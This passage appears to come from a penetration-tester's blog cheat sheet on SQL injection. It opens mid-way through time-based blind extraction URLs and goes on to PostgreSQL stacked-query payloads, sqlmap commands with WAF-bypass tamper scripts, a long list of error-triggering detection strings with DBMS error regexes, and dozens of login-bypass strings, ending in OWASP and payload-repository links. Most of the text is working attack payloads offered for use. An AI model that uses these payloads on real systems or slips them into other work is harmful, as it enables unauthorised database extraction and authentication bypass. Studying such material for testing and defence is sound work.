http://redact.com/page.aspx?id=1; IF (LEN(SELECT TOP 1 column_name from testDB.information_schema.columns where table_name='Members')=4) WAITFOR DELAY '00:00:5'-- (+5 seconds)You can check the length before you start testing away
http://redact.com/page.aspx?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from testDB.information_schema.columns where table_name='Members'),1,1)))=117) WAITFOR DELAY '00:00:5'-- (+5 seconds)
http://redact.com/page.aspx?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from testDB.information_schema.columns where table_name='Members'),1,1)))=115) WAITFOR DELAY '00:00:5'-- (+5 seconds)
http://redact.com/page.aspx?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from testDB.information_schema.columns where table_name='Members'),1,1)))=51) WAITFOR DELAY '00:00:5'-- (+5 seconds)
http://redact.com/page.aspx?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from testDB.information_schema.columns where table_name='Members'),1,1)))=114) WAITFOR DELAY '00:00:5'-- (+5 seconds)
Column Name = 117,115,51,114 = userPostgresql Blind SQLI(Stacked Queries):id=1; select pg_sleep(5);-- -1; SELECT case when (SELECT current_setting('is_superuser'))='on' then pg_sleep(5) end;-- -

8.Blind Sql injection exploitation via sqlmap:

sqlmap -r req.txt -v 3 --time-sec=5 --technique=T --current-db
sqlmap -r req.txt -v 3 -p "input parameter" --level=5 --risk=3 --time-sec=5 --technique=T --current-db
sqlmap -r req.txt -v 3 -p "input parameter" --level=5 --risk=3 --time-sec=5 --technique=BT --current-db

9.Blind Sql injection WAF bypass (tamper):

Example:
sqlmap -r req.txt -v 3 -p "input parameter" --level=5 --risk=3 --time-sec=5 --technique=T --tamper=between --current-db
Mysql,Mssql,Postgresql,Oracle (Blind):
between
Mysql (Blind):
ifnull2casewhenisnull
ifnull2ifisnullMysql,Mssql,Postgresql,Oracle (Blind):
charencode
Mysql,Mssql,Postgresql (Blind):
charunicodeencode
Mysql (Blind):
commalesslimit
commalessmidMysql (Blind):
escapequotes
UTF-8 (Blind):
apostrophemask
overlongutf8overlongutf8moreBypass waf in JSON (Blind):
charunicodeescape
Mysql,Postgresql,Oracle (Blind):
greatest
Cloudfare waf (Blind):
xforwardedfor

And

Quick SQLMap Tamper Suggester:
https://github.com/m4ll0k/Atlas

10.Sql detection payload (Generic Error):

'
"
"'
' "
'"
'''
.
/
\
%5c
%27
%22
%23
%3B
%27%22%60
%22%27
%27%20%22
%27%22
%27%27%27
)
")
')
))
"))
'))
)))
#
;
''
`
``
,
""
//
\\
%
%00
||
0.or-1%23
'or-1%23
%2F
%5C
%29
%22%29
%27%29
%29%29
%22%29%29
%27%29%29
%27%27
%60
%60%60
%2C
%22%22
%2F%2F
%5C%5C
%7C%7C
28 %
%2A%7C
//*
%7C
29 %
(
*/*
|
*
*)(&
*)(|(&
*)(|(*
*))%00
-'
#Detection source:["SQL syntax.*MySQL", "Warning.*mysql_.*", "valid MySQL result", "MySqlClient\."]
["PostgreSQL.*ERROR", "Warning.*\Wpg_.*", "valid PostgreSQL result", "Npgsql\."]
["Driver.* SQL[\-\_\ ]*Server", "OLE DB.* SQL Server", "(\W|\A)SQL Server.*Driver", "Warning.*mssql_.*", "(\W|\A)SQL Server.*[0-9a-fA-F]{8}", "(?s)Exception.*\WSystem\.Data\.SqlClient\.", "(?s)Exception.*\WRoadhouse\.Cms\."]
["Microsoft Access Driver", "JET Database Engine", "Access Database Engine"]
["\bORA-[0-9][0-9][0-9][0-9]", "Oracle error", "Oracle.*Driver", "Warning.*\Woci_.*", "Warning.*\Wora_.*"]
["CLI Driver.*DB2", "DB2 SQL error", "\bdb2_\w+\("]
["SQLite/JDBCDriver", "SQLite.Exception", "System.Data.SQLite.SQLiteException", "Warning.*sqlite_.*", "Warning.*SQLite3::", "\[SQLITE_ERROR\]"]
["(?i)Warning.*sybase.*", "Sybase message", "Sybase.*Server message.*"]

11.SQL Injection Auth Bypass:

'=' 'or'
' or ''='
/1#\
'-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
1'or'1'='1
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' or '1'='1'/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*

References :

  • Blind SQL Injection

https://www.owasp.org/index.php/Blind_SQL_Injection

  • Testing for SQL Injection (OTG-INPVAL-005)

https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OTG-INPVAL-005)

  • SQL Injection Bypassing WAF

https://www.owasp.org/index.php/SQL_Injection_Bypassing_WAF

  • Reviewing Code for SQL Injection

https://www.owasp.org/index.php/Reviewing_Code_for_SQL_Injection

  • PL/SQL:SQL Injection

https://www.owasp.org/index.php/PL/SQL:SQL_Injection

  • Testing for NoSQL injection

https://www.owasp.org/index.php/Testing_for_NoSQL_injection

  • SQL Injection Query Parameterization Cheat Sheet

https://cheatsheetseries.owasp.org/cheatsheets/Query_Parameterization_Cheat_Sheet.html

  • SQL detection and Exploitation:

http://www.securityidiots.com/Web-Pentest/SQL-Injection
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection
https://github.com/payloadbox/sql-injection-payload-list
https://github.com/Y000o/Payloads_xss_sql_bypass/blob/master/Payloads_xss_sql_bypass.md

Ansar Uddin

Love to pwn system ! Silence Is the most powerful scream